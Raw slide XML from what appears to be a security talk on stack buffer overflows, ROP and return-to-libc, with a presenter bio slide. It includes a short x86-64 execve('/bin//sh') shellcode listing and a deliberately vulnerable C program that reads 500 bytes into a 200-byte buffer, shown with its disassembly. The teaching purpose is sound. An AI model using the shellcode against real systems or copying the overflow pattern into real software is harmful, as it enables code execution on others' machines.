            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Place no-op sled on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Place Shellcode on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Align RIP (Instruction Pointer to point back to shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800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883196A3-4FFE-0DEA-4667-1D0D3443379C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119728" y="1645443"/>
            <a:ext cx="210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Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF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01A6EEF2-00E3-8939-AD48-9A8AF56F5DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119727" y="5826527"/>
            <a:ext cx="210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Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00000000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0D3FD-86C7-DA52-6EA6-820011138129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5278692" y="1855839"/>
            <a:ext cx="3263080" cy="39703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nsolas"/>
              </a:rPr>
              <a:t>global _start
section .text
_start:
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsi,rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	mov rdi,0x68732f2f6e69622f
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push 59
	pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cdq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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4A402CE-13FB-A5DC-D35C-C17E3F9B7CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782903" y="5826526"/>
            <a:ext cx="21030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Consolas"/>
              </a:rPr>
              <a:t>Shellcode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4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Traditional Buffer Overflow Exploit (cont.)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0DE2AC1-69A9-6FAC-BBFC-FFA7FFED7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50857"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="919975" y="3559097"/>
          <a:ext cx="10577576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548">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4104290975"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2538253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="88160365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2462949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2106719825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3540512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3168807671"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="64156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No-op sled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Shellcode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Address of No Op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07886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3287619-1205-1B53-D769-09292FB5DF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8876413" y="4303150"/>
            <a:ext cx="3078750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latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF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41530-64E1-0CE6-2711-03351CF79D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611045" y="4210224"/>
            <a:ext cx="2436038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latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a: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2CC73F7F-0D19-110A-805D-2A0A5DC8CE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2970838" y="2493582"/>
            <a:ext cx="5599708" cy="8331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895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Traditional Buffer Overflow Exploit (cont.)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0DE2AC1-69A9-6FAC-BBFC-FFA7FFED7561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="919975" y="3559097"/>
          <a:ext cx="10577576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548">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4104290975"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2538253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="88160365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2462949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2106719825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3540512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3168807671"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="64156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No-op sled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Shellcode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Address of No Op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07886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3287619-1205-1B53-D769-09292FB5DF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8876413" y="4303150"/>
            <a:ext cx="3078750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latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF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41530-64E1-0CE6-2711-03351CF79D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611045" y="4210224"/>
            <a:ext cx="2436038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latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a: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2CC73F7F-0D19-110A-805D-2A0A5DC8CE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2970838" y="2493582"/>
            <a:ext cx="5599708" cy="8331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4525C-518B-7F77-CC57-C952E29B8F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2292399" y="1790194"/>
            <a:ext cx="6815751" cy="38137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mr-IN" sz="4000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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687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Why does traditional BOF no longer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r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stack canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Address Space Layout Randomization (ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No Stack Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Compiler warnings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hardware changes to prevent execution of code on the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"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189557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Return Object Programing (ROP)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SzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Allows attacker to hijack program control flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker can execute arbitrary code with "gadgets"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Gadgets machine instruction sequences that are presented in the machine's memory when the code is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Allows attacker to bypass ASLR and no stack execution protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2989595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Return Object Programing (ROP)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CEAC8-B6B4-630B-C77D-6CD7AA2D494D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379963" y="256478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34BECD-4ACC-5D2B-A20F-4D0DE4304394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446244" y="258924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A7A60-D0D3-337E-D975-D62DF386295A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080796" y="2414296"/>
            <a:ext cx="256591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Hijack code already in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F18AA-E6EC-71DD-7BB1-AC36B4E8667D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327571" y="2414296"/>
            <a:ext cx="2565918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These are called "gadgets"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="ctr">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200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ABF89841-EC58-5EA0-3EA2-586F5521D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855" y="1901725"/>
            <a:ext cx="3782289" cy="390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4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err="1"/>
              <a:t>Whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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5558880" cy="4043765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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I am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>groot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Senior Security Engineer at Health Equity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Master of Computer Science (Cybersecurity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offensive Security Certified Professional (OSCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HackTheBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> member since 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pP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D21E40-6889-10F0-2A7D-F70F2F62CAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6832409" y="3641908"/>
            <a:ext cx="4667800" cy="2339840"/>
            <a:chOff x="6907259" y="3012934"/>
            <a:chExt cx="4190403" cy="1935889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 5" descr="Logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64400F7-6906-6A79-BF93-46C59E7BF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7259" y="3207467"/>
              <a:ext cx="1991337" cy="1546819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EB920E75-E255-9515-C877-90021F875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4767" y="3012934"/>
              <a:ext cx="1932895" cy="1935889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600848-09A4-E03D-5F1B-43AAF4E9CB0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6976303" y="1117261"/>
            <a:ext cx="4306676" cy="2077160"/>
            <a:chOff x="7007405" y="907322"/>
            <a:chExt cx="4086339" cy="2003715"/>
          </a:xfrm>
        </p:grpSpPr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2B1B7D46-3AFB-FBEC-5EA4-1592177A5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112" t="204" r="25703" b="719"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7007405" y="907322"/>
              <a:ext cx="1670473" cy="2001448"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F8B76B50-6D97-25DC-58EC-44C9E0241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62387" y="908640"/>
              <a:ext cx="1931357" cy="2002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10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Return to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Libc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pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker hijacks program control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker chooses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>library function (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> function)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker overwrites the return address with its entry location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Attacker executes arbitrary code by chaining function calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2000172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ROP Exploitation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36CF64-95DD-6688-B9F3-AADCC2536639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295081" y="1825404"/>
            <a:ext cx="3656246" cy="42032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#include &lt;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stdlib.h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&gt;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#include &lt;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stdio.h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&gt;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#include &lt;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string.h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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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int main(int 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argc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, char* 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argv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[], char* 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enp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[]) {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 char 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buf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[200];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 puts("Enter your message:");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 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printf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("&gt; ");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 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fflush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stdout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);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 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fgets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(buf,500,stdin);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 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printf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("You said: %s\n",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buf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);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 return 0;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BFE493D-B275-A4D4-AA36-95085CA19996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="608069"/>
            <a:ext cx="6265003" cy="564259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sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1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 sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>rbp,rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>sub    rsp,0xf0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x401070 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rbp-0xd0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x1f4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi,rax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x401090 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fgets@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret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071CAEE-0BC4-DA4D-F6A3-17504863A2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706724" y="3631162"/>
            <a:ext cx="1407368" cy="3576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AF566A-4FA5-C299-69FB-F3829B28CC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706724" y="4735283"/>
